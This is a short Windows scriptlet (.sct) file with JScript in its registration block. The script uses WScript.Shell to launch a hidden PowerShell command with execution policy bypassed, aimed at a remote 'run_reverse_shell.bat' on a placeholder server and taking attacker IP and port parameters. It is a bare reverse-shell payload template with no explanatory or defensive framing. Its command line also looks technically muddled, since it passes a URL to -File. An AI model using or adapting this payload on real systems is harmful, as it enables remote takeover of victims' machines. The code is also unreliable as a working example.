<scriptlet>
  <registration>
    <script language="JScript">
      <![CDATA[
        var shell = new ActiveXObject("WScript.Shell");
        shell.Run("cmd.exe /c powershell.exe -NoP -NonI -W Hidden -Exec Bypass -File http://yourserver.com/run_reverse_shell.bat attacker_ip attacker_port http://yourserver.com http://proxyserver:port");
      ]]>
    </script>
  </registration>
</scriptlet>

